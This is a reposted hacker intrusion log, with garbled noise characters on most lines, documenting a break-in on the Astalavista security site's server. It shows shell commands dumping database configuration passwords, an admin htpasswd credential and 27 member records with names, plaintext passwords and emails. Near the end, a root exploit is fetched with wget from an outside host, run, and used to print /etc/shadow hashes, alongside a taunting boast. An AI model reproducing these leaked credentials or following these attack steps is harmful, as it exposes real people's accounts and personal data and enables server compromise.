" t! Z8 v* t, z! O. S1 L: wdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..
7 J( L5 m7 @) f% m( \2 Udrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007& i e- E ^$ p# T' w& U
drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
$ I. z. N! S9 M; Odrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
. n g4 K! p: F3 ~0 r0 u. g; o' Jdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
% [; o. O" z( h- D7 ^! Edrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
3 |# o6 O! X& a2 w-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg- u- s5 V, y+ F+ n/ W9 ^6 D
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config9 |4 b+ E# k1 L+ Z8 m8 q
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
. O/ P; M3 M2 D3 W( L% o; Fdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
8 b% T% K( D2 W- \-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php! L1 |8 F/ L0 k
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
9 O5 [" ]' o: G6 H3 T5 Pdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
! T& [, h+ A. V( Ldrwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
7 s: V; `0 _% ^. c& l# ]' p-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess# W% c( q2 g6 h3 O
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess! b( A/ k1 z ?" F
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php
1 b/ I; a8 Q( d) U: S( b/ w/ h-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
7 h% }& _0 t$ U h: u/ m-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php) @6 T* D" |5 X, }- _) m' i
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
4 |4 U$ F2 G P-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
( u% C: [% `5 d- b3 }& }( _6 ~) R( Ndrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc c9 @, [& f: f% ~, B4 S
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang* u a$ j) u: f
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
8 Y- m7 d: G1 b- Qdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log0 x- t7 J' F( J6 r- e6 d9 Z/ K
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
- |/ {# H* [9 ?3 O* Wdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
4 r |" p) G' ~; b ?. m( p, p$ T% }drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
9 f5 e# M" \: k-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
$ c: ?3 ?* x$ J" K' m5 I8 Ydrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re! D9 ? k# T4 a$ R$ W
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt; G4 p8 K+ {; [
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss3 t O; o8 @4 y+ ^6 @& D+ Z' s4 @
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
8 Q k' m" e5 Z |9 {drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
$ y* m: _7 d3 {; P$ }2 R! u$ [drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes$ v6 l. M5 q: K, t H
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
3 M; |# \3 X e4 gdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl& i3 l7 {+ N0 h, e3 O% e& o
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
/ \2 g. s5 \& M$ O8 ~9 y, cdrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old1 k, f. _6 }# a. b1 _* L+ r7 P$ ^! D$ X
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php$ x( f* Q- d7 G( L' B5 a
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki5 e, L" a- q3 D- ~/ J/ h
- y( `' C4 N- @2 h; nsh-3.2$ head -20 index.php% |1 u: O) N% p; W; `
<?PHP$ J. y' q5 s7 c
/**
, l3 f1 X5 S8 k0 s/ w* Mainfile (external) for astalavistaNET v2.0' x$ g( e1 A) K/ N9 a# R7 ?
*
; G! G' [. y+ J' d. J- {* @copyright Astalavista IT Engineering GmbH
% }% [4 A# T4 Z2 J" I* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
3 H# ^/ k3 C9 ?8 G% A3 o( o& f/ ^* @version 1.0/ J! v) k9 B; C; B( M) h# V! m
*/
! m( s+ ^9 K, c9 n
: m% H" @( E8 _% {/ W. O if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
3 ^: L4 q3 @& v& Y1 u3 A $dontStartSession = false;
( R; i: w j4 B! b+ K } else {; x0 m2 }5 s6 `6 M5 ]% T
$dontStartSession = true;1 W8 i* i6 k! W0 F: R/ b% o9 {
}
c* i. G/ `8 `! x( s \ require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);, i: L# U; ^: b3 {; B' ?
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
, W8 X+ ?; W% a5 ]$ |' k6 G require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);. y c' s2 j" A6 E ~& `
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
' d1 @6 i6 |5 Y8 J
" o/ Z" ^: |4 F% F' j) @sh-3.2$ cd config
. i8 E" K/ x" e( F: H! Zsh-3.2$ ls -la
* p4 B7 }% c' S+ T5 c& M3 dtotal 32
# _$ D* F! [' R* A+ zdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .- p2 p) o4 u& I6 I; i: j1 O/ V
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
0 L: E3 E d. V8 D6 d5 L" a9 Z* [-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php
! U! i% ]/ Z, Z: U' a) B% P5 x4 I-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php3 X% n% E. e7 X% o4 o* i3 m& ]
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
1 c& j- V$ q+ B& a" r1 n-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
) q& t7 _" B: [+ I e-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
( }/ E& G1 r' z( H+ @5 j0 S# {$ z2 B# B# e+ L4 ?5 R
sh-3.2$ cat com.conf.php" B- `, S5 o8 h9 T9 u, A5 j! m
[snip]& O. a1 C) }: f7 _
//member-database
# g. w; d2 s( \7 a$_CONFIG['db_mem_server'] = ‘localhost’;1 R: W7 e" \1 A
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
" Y9 _/ [6 B! R: U$_CONFIG['db_mem_user'] = ‘astanet_db’;& C! L7 \ [0 Y& G4 b- o
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;6 g$ p5 t) b& _& D. ~5 Y, V: [4 g
$_CONFIG['db_mem_debug'] = false; //true or false
; ?: e9 a" E! I5 t5 g' @& _1 u//ads-database/ z( a& ] o. i2 o7 I( V) A
$_CONFIG['db_ads_server'] = ‘localhost’;1 x8 w6 R' Z$ y5 ~/ [
$_CONFIG['db_ads_database'] = ‘astanet_ads’;5 t* ~. L+ ]7 [
$_CONFIG['db_ads_user'] = ‘astanet_db’;
2 h7 P4 G: ?4 c$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;$ C) W9 O* b* J Q3 w
$_CONFIG['db_ads_debug'] = false; //true or false
% h$ F3 r) a! w+ s4 p! J* Q3 V//rainbow-database, j3 P; b1 Q B
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;/ h! t) }2 I6 x4 }( T* Y: v
$_CONFIG['db_rainbow_database'] = ‘rainbow’;7 l5 Y {4 q! n5 p
$_CONFIG['db_rainbow_user'] = ‘dinu’;
( h3 r6 H# E1 f% s7 j* G9 M, L$_CONFIG['db_rainbow_password'] = ‘dinudinu’;" y) m+ q. t6 p, X
$_CONFIG['db_rainbow_debug'] = false; //true or false* \9 h* _ x( K( P
//mailing lists database
( T7 g0 p5 ]$ n2 p5 |3 d5 d# o/ E; q$_CONFIG['db_mailing_lists_server'] = ‘localhost’;6 z; @: ~% }, ^1 G$ {! d5 ^# r
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
& n7 @3 i; U0 R- C1 W+ z$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;2 ~; [* H# Y8 ]+ n2 S. K
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
. _8 y. l+ {! e9 X$ e: ^; m% D$_CONFIG['db_mailing_lists_debug'] = false; //true or false
- L" o* Q6 O. X//paypal
3 f: h0 L& ?$ r. d( \1 l8 D$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
6 t& i# _6 S6 N! k8 [$_CONFIG['sub_pp_cmd'] = ‘_xclick’;
! q# T" N9 K- \/ ~* `1 B' c$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;9 n9 R- p# a0 ]- T u6 B* g
$_CONFIG['sub_pp_noship'] = ‘1′;
' y; r/ O& M1 {9 _# Z0 B$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
) J2 d2 Y4 g' w, t8 I8 `/ _* @3 [[snip]: l) T6 w7 a4 h3 |( A1 j o- w
. o# D' I! }9 B
sh-3.2$ cd ..9 l* }* o, q9 b
sh-3.2$ cd member
$ I2 B0 \# I" F2 F! k5 z. ish-3.2$ ls -la
6 e& ?4 O( K6 r1 k ltotal 20
3 D8 ? X5 B: \4 s8 E' n, rdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
t D2 j. A/ K8 pdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..8 N8 m4 Y# \- [" a7 E
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess o) G; p0 E8 e5 o% `/ m; u
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php+ {# y9 _; ^ }! u! I1 ?5 }5 L
sh-3.2$ cat .htaccess" P! x; Z$ Q8 Z d
SecFilterEngine off' X, R1 Z c# b V
- C% x. x# G, ash-3.2$ cd ..
6 O, R/ l# Q) K9 Q9 ?6 e( Z" a$ z' _sh-3.2$ cd cron
1 D, }) [ Q2 c4 k' P7 x- ssh-3.2$ ls -la6 d; E6 V( c( j
total 168+ o2 ~0 W* a, r9 t
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .3 d" ?( g6 j1 }
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
0 r: i9 r! {# h-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
0 ]. {6 C! T, U( @- O# z-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
% [% n3 c- M1 K. x-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
L6 ^% [* t& m4 u, A' S# U-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
, y4 q7 a: D8 W3 I6 R-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
# A. ^% E" P/ _5 f-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
0 c; Q. r. e) ?6 Y/ E$ Z V1 Z& ^-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php: i/ Z( B! s4 v! r# r
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php7 S/ F6 |* p3 [2 v
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
% J2 m r( ^) J- o5 x-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
$ q) q- O3 }$ S5 Y4 R# c q ~& r-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php% Y* P; b6 h/ W7 ?
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php( I2 s$ f# }4 F6 W& |4 |
-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
0 [, D1 b$ \; g4 e+ V-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php9 t" p0 ~1 o4 D, u9 h, P
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
2 A j/ ~$ e9 ?" m1 j* m-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
4 Q9 n+ V' W: ? {+ \0 p3 B4 p-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
' Z" V& _- d9 t4 T5 m3 v-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php
9 \; o$ A1 Q8 d" s& P3 u) _drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email0 X$ |( l- S% k$ i
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php4 y! B4 A& x* N4 t/ a
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php, d" ^& E/ H" ]* m8 ^) F* U
2 i& d- h* u( N0 U
sh-3.2$ cd .., x& `8 Q0 W" r- Y
sh-3.2$ cd _007
! L I3 B2 B nsh-3.2$ ls -la# @# ~6 v$ y" g9 @- ?
total 24
: L1 I# h" e) _- F( odrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 . I( v' F$ a3 x
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
% e5 l" b; x( H3 i% b* j-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
" _* |: Q a o0 b( v" D4 G-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php9 p* B' }5 A9 x% w' b1 h( h
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
" O+ K! e+ k: D/ y5 A+ Z2 t. ddrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap Z% @, `6 d1 X& K
% }% K! X5 s6 ?1 L2 M0 [sh-3.2$ cat .htaccess
; D2 O& k7 @: Z. z# ^authType Basic
' [) i, d$ v: [. HauthName Admin
/ Y: V. o5 _- Z$ t- g7 WauthUserFile /home/astanet/auth/.htadm_pwd
# V9 c/ l) t, K& B; y- |2 ~+ Qrequire valid-user
- E$ n. y: L5 Y1 m3 r
' s+ v9 T" v6 J: z" Esh-3.2$ cat /home/astanet/auth/.htadm_pwd
! N# \! c1 i' \/ Y: y% s' \admin2net:CR0bl65MwhfT
1 H K4 v; J$ Z4 I% S) M1 n. x: q+ ^* X; s) ]
sh-3.2$ mysql -u astanet_db -p
* ~7 b& x2 |2 S0 {. ?' sEnter password:
) T( ]+ s' w6 ^! h; T$ W9 dWelcome to the MySQL monitor. Commands end with ; or \g.
2 o9 a3 c6 Q' s2 E# p1 eYour MySQL connection id is 275153$ z" v3 W' ?' c3 `5 a& Z
Server version: 5.0.45-community-log MySQL Community Edition (GPL)( }$ l" l4 b/ U R% V& Z5 {0 S. ?' _
c6 J9 f6 ]* h, P9 f% y) o) eType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.: T$ e8 q, \. w* m1 v* ^( Z
8 A! _! N" d- e2 z, \$ w
mysql> show databases;
$ I i4 M. y# H7 r+———————–+
# [4 R2 ~% r, @! P; K# w6 U$ v| Database |# e* T7 |3 r+ Q+ w) L! C7 b; |. F
+———————–+
6 s9 Z, m& d" y3 z! i, ]| information_schema |
- }: C0 s; A4 N) z* y| astanet_ads |
% ~6 P- m6 k$ z& a| astanet_mailing_lists |1 ?' ?$ U# e7 T3 b, _+ F6 p6 t
| astanet_mediawiki |( M9 }. V- |: \& E
| astanet_membersystem |' n0 k* i( ?: |9 V
| test |8 @5 O; I* g7 d; u' M+ Q
+———————–+
8 P5 s, ?+ p$ b& F$ u' q6 rows in set (0.00 sec). b/ _5 s% w0 g. ]
) ]* M; Y4 i% b4 z* @: A n6 h( T
mysql> use astanet_membersystem# l1 V1 A# E4 x/ m
Database changed
0 r) k- Z% K& [: umysql> show tables;2 m3 n$ j" \7 P- o3 s
+———————————–+
/ i2 ` w) A6 A6 C| Tables_in_astanet_membersystem |
/ y. P0 t9 R" _8 }9 Z+———————————–++ A) f6 Q! K4 E
| blacklist_categories |
' U6 p b: q9 H6 u& b- L| blacklist_content |% h; Y/ u# F* L2 \2 f
| blacklist_levels |, u7 o7 v0 ?& K2 I, j4 B. Z# K
| blacklist_mcset |
) C' L* n. Q" C# R& w2 a| dir_categories | t, i2 g' _3 z u# U
| dir_comments |+ Q4 y) E$ y( k# Y! g/ Z
| dir_links |; @! ? o( o1 N
| dir_temp |
. C3 @2 b5 T8 E5 Y| dir_votes |- ~1 ^3 |1 i5 _- D3 u+ X5 ], w
| documents |2 [& J6 C9 P: {/ L
| documents_categories |
/ C$ c! X1 i2 X% |$ j/ h* s' J4 w| email_content |) X6 e8 h/ c2 h2 a5 q8 \
| email_settings |( ~ w! k) B$ y
| exploits |5 f( a3 Y# X1 V/ x2 \
| exploits_categories |" d9 G6 T5 x+ P0 q2 W. y
| exploittree_categories |
8 P, s. ?8 K i1 y* H! q& d: v| exploittree_exploits |8 y2 @0 |: W5 _( ?0 N* i( G( Z* x
| home_values |
4 R- R+ f( X7 A @" P| iso_countries |
) U& {0 j. x; P| links_categories |
* R( {3 {! A5 q| links_records |
" }& ^4 U9 x& Z| links_unauth |
; v4 b8 i: @0 y1 _7 H% D5 f; j* O| links_votes |
: ^* i- G; @6 M. V1 ~$ @| log |
" [. R7 P! |; z+ b% m| news_categories |
/ e% q$ P! Q& @% |: s| news_comments |
& g% A. o- t- U& \6 d| news_emoticons |
+ G9 d- F& I3 p S2 p( }; ?| news_latest |
8 I% Q; t5 `9 s6 {6 G8 p1 s| news_messages |
( b! Y# c: J( R4 n* O1 i| news_statistics |
# i4 H% J' y2 r- \: _5 B/ @| news_votes |
1 U' o! n* U5 {+ N, x| prices_content |, B8 C9 P8 \& x* x
| prices_offers |# x' _7 {; n0 q* W. r
| rss_settings |& ^3 |1 N$ U; K# d
| sessions |3 o# i" F% W, p2 H0 _8 C
| stats_signups |
2 t$ r& }2 t) y( J8 Z& q| u2u2 |/ i2 x; L# }& A \- W' O
| u2u_contact |* l' B0 Q, U. G6 ^* H; c6 N. g* v
| u2u_settings |+ @7 m! r+ h. c2 ^5 V
| user_keywords_selected_categories |
7 q8 V! i- j3 a1 F| users |
/ F2 g5 _) e- I( P" s- Y! B| users_ipn_test |
2 C5 z, S; p; P. s| users_keyword_values |% W4 e9 O* [ X, }( r
| users_profile |
% x. O' d4 n3 g9 ^% K| users_temp |
2 O8 l* H/ M6 w% B| users_upgrade |
6 C+ {6 A2 b& w3 G+———————————–+
5 l. ^: j7 r4 E. y7 Z46 rows in set (0.00 sec)
: G$ u4 Q i( J% P5 c2 m+ G4 s& b2 m1 x
mysql> describe users;4 @8 X* h0 v" l) g2 P
+————————–+————————————–+——+—–+———————+—————-+
+ d2 ?7 ^/ E6 D! y9 ?- U C6 b| Field | Type | Null | Key | Default | Extra |
( B0 S" |% ~9 `+————————–+————————————–+——+—–+———————+—————-+
* D6 F V* ]% F& l| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment | ]: R! X$ D6 Z' W3 m- ~
| user | varchar(50) | NO | | | |
. o1 c5 h% \; ~5 ]* K6 d| nickname | varchar(30) | NO | MUL | anonymous | |: _2 w t- |9 j9 I: Y7 i/ `
| password | varchar(30) | NO | | | |. k. `, \$ W+ N2 l# Y* z0 H
| userlevel | tinyint(3) | YES | MUL | NULL | |
1 _+ s/ h; \( o" L( @% F| exp | int(8) unsigned | NO | | 0 | |6 u! _2 `" O4 o1 N" e' {
| email | varchar(50) | NO | | | |+ _9 P; b, }& X; x
| ip | varchar(15) | NO | | 0 | |2 }" b6 c: O" x+ U+ \5 {
| proxy | set(’0′,’1′) | NO | | 0 | |
( O) }7 f, F0 C3 L| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |4 {7 I3 P7 o% }) y$ Q( |
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |& c! p% A& D4 N
| anz_in | tinyint(1) | NO | | -1 | |
5 Z) ? x6 E2 a# X8 t; D7 g5 q) N0 j3 {| status | tinyint(1) unsigned | NO | | 0 | |( R0 t9 y3 \4 L4 l4 W8 r
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
3 `6 W- B& P% X8 G4 R| freemember | set(’0′,’1′) | NO | | 0 | |
0 \& K- |" ]* p& c| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |/ \3 C9 Q$ q: T( z9 F" t" M
| lang | tinytext | NO | | | |
- R' ~& d2 b6 \8 E( D: c| adid | smallint(6) | NO | | 0 | |4 Q- q& j8 h6 O/ V! I
| pp_txn_id | varchar(255) | YES | | NULL | |
' s( s, A/ @2 i( A2 v Z4 E| cnb_transaction_id | varchar(255) | YES | | NULL | |
* y2 J8 u' K$ G, x' B| cnb_order_id | varchar(255) | YES | | NULL | |3 {- i% w4 L* }, P0 X4 l
| cnb_user_id | int(11) | YES | | 0 | |
9 m/ p! _% h7 o' j+ ^+————————–+————————————–+——+—–+———————+—————-+
5 f4 G3 z( E" M/ g0 s22 rows in set (0.01 sec)
) [7 R0 n- S j' r" R! c6 p1 Y) H2 X& G" s
mysql> select count(*) as skids from users;
5 p+ O. r T4 e% G/ F. s# d3 t J+——-+
6 y' J7 R& B" w, f. u! P. k| skids |5 Y* e- p' a p* B2 s. j$ U3 { d! R
+——-+% k* j2 O- L& U# D# d3 _
| 25199 |8 @4 O. Y7 s6 c$ S6 \8 ~" N
+——-++ c/ e& d7 f* l2 q. D
1 row in set (0.00 sec)3 ]* Z/ @1 j y: Y0 p8 Z: I
5 \# m2 o* T8 H; `' c, cmysql> select user,nickname,password,email from users where userlevel = 1;5 S+ h/ R2 y6 }4 T
+————————–+———————-+——————+———————————–+3 g- P+ D! o* S7 ~* Q% M& {( x+ L
| user | nickname | password | email |
8 G+ V- g+ W6 A! n+————————–+———————-+——————+———————————–+
. t% x3 }, k4 q* b6 S| pascal | prozac | astaman3 | 链接标记info@astalavista.net |& Z+ R, c/ V$ D# X% S
| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |( u& N7 u: l T! }. |$ m
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |" w! i* V S% y+ m3 _" w7 H' z
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |% V; m2 l" w6 N7 x6 {
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
9 j, b; q: w7 o- F; g& m9 z| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |- ^' \7 |, M; y/ ]8 X1 b& e. O
| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |( K c- L! l0 y# S) ^# k
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |! l, r, \, ?' _+ s% G! d
| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
' d' Z3 @; n; O9 A; Z' Z" M| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
6 [3 I5 z) U" o/ o$ v, S+ P5 z( A| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |' f- Z: P3 p9 F6 t, D
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |: J. ?. X7 R; J6 N. V+ Z& S
| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |" V% P+ `: j; x
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |' t3 B! A: F) [% v4 C5 r! [4 A
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
/ M9 b5 {& ~+ }+ l7 \1 o| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch | E& z- H$ A& G. z! k6 D
| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
6 ~8 ]* M2 a- {| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
1 h: e! G4 a8 l f| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
. s+ K2 H Z( C! D7 F, Z2 R| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
* E& \9 ^3 r* Y* f| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
U0 ]! g6 \- k p| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
) G9 G# ^6 D- o* [9 \! @, ]2 q| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |/ w" I9 y( T# N+ H
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |+ C, G( M+ h1 ?! Q
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |2 q0 w: V2 f2 T
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
7 s7 o: c2 A5 C2 Q% h% D| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |3 U9 s! _; a3 @) Y* F
+————————–+———————-+——————+———————————–+
( _& s/ `# F; ~5 E7 v" G27 rows in set (0.00 sec)
+ {3 Q6 e9 ?( |: J$ s. T c% `" y/ B3 k6 ]. P' h5 _7 n0 J1 P
mysql> exit;
" X0 k" v- N# n& ]2 IBye! X W. ~1 Y+ [2 I. ]" i
1 r- K F& T& P1 }1 j! _2 l
[~] plaintext passwords? yes,# i' }) M. |/ B9 g. V
Those so called “security professionals” who charge you $6.66 / month to" u6 H2 I+ o/ c$ ^! Q, f4 y
register at their hack-proof portal, save your passwords in plaintext…8 C2 I) \( u1 Z8 @9 Q# t9 Y
brilliant!) l( h/ I( E! |5 `7 a3 M3 V
4 S2 B4 X; r) N% X( D2 [0 v8 R$ L1 x
[~] This been fun but we want more.
$ f8 q( o- g2 O5 c; j& p- |" K
4 [3 E" P8 J" U" I' q3 _( hsh-3.2$ uname -a
* H \- x8 F- O7 [7 f6 {; ?Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux7 k3 Z- S! a0 {
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
5 h U. ~5 z K–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
8 `# r1 q: a% _3 a. eResolving anti.sec.labs… 13.33.33.37
, @- ?) q2 ?; r+ z7 H c3 b7 bConnecting to anti.sec.labs|13.33.33.37|:80… connected./ q# o5 B7 `1 x3 V& A5 M
HTTP request sent, awaiting response… 200 OK
; H9 s; m. g! j8 YLength: 18200 (18K) [text/plain]
7 [0 Z! M0 E, \Saving to: `g0troot’: a( i4 n; U; [
- Q& O9 a+ H$ N/ V. [0 t100%[=========================================================================================================================================>] 18,200 58.6K/s in
8 I! R5 h; k' l% I3 G. N: [0.3s
z9 r) M8 `5 ?! h5 q! T/ U! d' D, @* k$ ^9 M4 |( K
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
L" A& j; _# a# `+ ], B) m$ F# M/ L* J
7 G% |7 w8 b8 B* v9 wsh-3.2$ ./g0troot -i x86_648 P0 n5 K2 c W3 |7 l4 y/ I9 U3 m
[+] g0troot - anti.sec.labs
% G0 ~3 m1 J7 X0 S# n1 m[+] Target: 2.6.18-128.1.10.el5/ P' u n7 I/ j, c F0 U
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
6 w; S8 q/ u2 u( [: x; f1 {: i, f( X8 ]
[+] r00tr00t
0 i. m, M! Q- @8 y& V" C1 ~9 ][~] Executing shell…
1 `- P, L/ c+ h& Q
: J. N) d4 R5 b# d) _1 s- Nsh-3.2# id
$ o) ^( i/ Y3 B Luid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
0 r/ i- t: V1 F0 k# |7 X
% l# |5 s1 l) R% o) ]. i% b. ^sh-3.2# cat /etc/shadow1 u" U! @! q8 X( o N) r( @
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
! H: l+ R4 w# T5 M! I; Z[snip]
8 S( U0 n! l+ K: G# \. N6 V/ qadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::3 R5 H$ X1 M1 z( O( O
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::( Z: ?5 m$ X! T6 {3 K
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
